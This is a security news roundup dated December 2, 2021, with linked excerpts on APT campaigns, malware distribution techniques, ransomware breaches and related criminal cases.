December 2, 2021

Title: APT Expands Attack on ManageEngine With Active Campaign Against ServiceDesk Plus
Date Published: December 2, 2021

https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/

Excerpt: “Over the course of three months, a persistent and determined APT actor has launched multiple campaigns which have now resulted in compromises to at least 4 additional organizations, for a total of 13. Beginning on Sept. 16, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released an alert warning that advanced persistent threat (APT) actors were actively exploiting newly identified vulnerabilities in a self-service password management and single sign-on solution known as ManageEngine ADSelfService Plus. Building upon the findings of that initial report, on Nov. 7, Unit 42 disclosed a second, more sophisticated, active and difficult-to-detect campaign that had resulted in the compromise of at least nine organizations.”

Title: Hackers Are Turning to This Simple Technique to Install Their Malware on PCs
Date Published: December 2, 2021

https://www.zdnet.com/article/hackers-are-turning-to-this-simple-technique-to-install-their-malware-on-pcs/

Excerpt: “The technique is RTF template injection. By altering an RTF file’s document-formatting properties, it’s possible for attackers to weaponize an RTF file to retrieve remote content from a URL controlled by the attackers, enabling them to secretly retrieve a malware payload that gets installed on the victim’s machine. Attackers can use RTF template injections to open documents in Microsoft Word, which will use the malicious URL to retrieve the payload while also using Word to display the decoy document.”

Title: Planned Parenthood LA Discloses Data Breach after Ransomware Attack
Date Published: December 1, 2021

https://www.bleepingcomputer.com/news/security/planned-parenthood-la-discloses-data-breach-after-ransomware-attack/

Excerpt: “However, it wasn’t until November 4th that PPLA determined that the stolen files contained patients’ personal information, including their “address, insurance information, date of birth, and clinical information, such as diagnosis, procedure, and/or prescription information.” In a statement to the Washington Post, who first reported on the breach, PPLA spokesperson John Erickson said the stolen files contained the personal data of approximately 400,000 patients and the breach was caused by a ransomware attack.”

Title: Emotet Now Spreads via Fake Adobe Windows App Installer Packages
Date Published: December 1, 2021

https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/

Excerpt: “The Emotet malware is now distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software. Emotet is a notorious malware infection that spreads through phishing emails and malicious attachments. Once installed, it will steal victims’ emails for other spam campaigns and deploy malware, such as TrickBot and Qbot, which commonly lead to ransomware attacks.”

Title: Researches Detail 17 Malicious Frameworks Used to Attack Air-Gapped Networks
Date Published: December 2, 2021

https://thehackernews.com/2021/12/researches-detail-17-malicious.html

Excerpt: “Four different malicious frameworks designed to attack air-gapped networks were detected in the first half of 2020 alone, bringing the total number of such toolkits to 17 and offering adversaries a pathway to cyber espionage and exfiltrate classified information. “All frameworks are designed to perform some form of espionage, [and] all the frameworks used USB drives as the physical transmission medium to transfer data in and out of the targeted air-gapped networks,” ESET researchers Alexis Dorais-Joncas and Facundo Muñoz said in a comprehensive study of the frameworks.”

Title: New Malware Hides as Legit NGINX Process on E-commerce Servers
Date Published: December 2, 2021

https://www.bleepingcomputer.com/news/security/new-malware-hides-as-legit-nginx-process-on-e-commerce-servers/

Excerpt: “eCommerce servers are being targeted with remote access malware that hides on Nginx servers in a way that makes it virtually invisible to security solutions. The threat received the name NginRAT, a combination of the application it targets and the remote access capabilities it provides and is being used in server-side attacks to steal payment card data from online stores. NginRAT has infected servers in the U.S., Germany, and France where it injects into Nginx processes that are indistinguishable from legitimate ones, allowing it to remain undetected.”

Title: Tracking a p2p Network Related to TA505
Date Published: December 2, 2021

https://blog.fox-it.com/2021/12/02/tracking-a-p2p-network-related-to-ta505/

Excerpt: “For the past few months NCC Group has been closely tracking the operations of TA505 and the development of their various projects (e.g. Clop). During this research we encountered a number of binary files that we have attributed to the developer(s) of ‘Grace’ (i.e. FlawedGrace). These included a remote administration tool (RAT) used exclusively by TA505. The identified binary files are capable of communicating with each other through a peer-to-peer (P2P) network via UDP. While there does not appear to be a direct interaction between the identified samples and a host infected by ‘Grace’, we believe with medium to high confidence that there is a connection to the developer(s) of ‘Grace’ and the identified binaries.”

Title: Double Extortion Ransomware Victims Soar 935%
Date Published: December 2, 2021

https://www.infosecurity-magazine.com/news/double-extortion-ransomware-soar/

Excerpt: “During that time, an “unholy alliance” of initial access brokers and ransomware-as-a-service (RaaS) affiliate programs has led to a surge in breaches, it claimed. In total, the number of breach victims on ransomware data leak sites surged from 229 in the previous reporting period to 2371, Group-IB noted. During the same period, the number of leak sites more than doubled to 28, and the number of RaaS affiliates increased 19%, with 21 new groups discovered.”

Title: Former Ubiquiti Dev Charged for Trying to Extort His Employer
Date Published: December 1, 2021

https://www.bleepingcomputer.com/news/security/former-ubiquiti-dev-charged-for-trying-to-extort-his-employer/

Excerpt: “Throughout this process, the defendant tried hiding his home IP address using Surfshark’s VPN services. However, his actual location was exposed after a temporary Internet outage. To hide his malicious activity, Sharp also altered log retention policies and other files that would have exposed his identity during the subsequent incident investigation. “Among other things, SHARP applied one-day lifecycle retention policies to certain logs on AWS which would have the effect of deleting certain evidence of the intruder’s activity within one day,” the court documents read.”

Title: Russian Man Sentenced to 60 Months in Prison for Running ‘Bulletproof’ Hosting for Cybercrime
Date Published: December 1, 2021

https://www.darkreading.com/attacks-breaches/russian-man-sentenced-to-60-months-in-prison-for-running-bulletproof-hosting-service

Excerpt: “Aleksandr Grichishkin, 34, offered technology infrastructure services, including IP addresses, servers, and domains, for cybercriminals to create botnets, infect targeted organizations with malware, and steal banking credentials. His organization supported cybercriminals who targeted the US organizations in cyberattack campaigns between 2009 and 2015. Among the rogue’s gallery of malware hosted on the systems:  Zeus, SpyEye, Citadel, and the Blackhole Exploit Kit. Two of Grichishkin’s co-conspirators already had been sentenced to prison: Pavel Stassi, 30, of Estonia (24 months), and Aleksandr Skorodumov, 33, of Lithuania, (48 months).”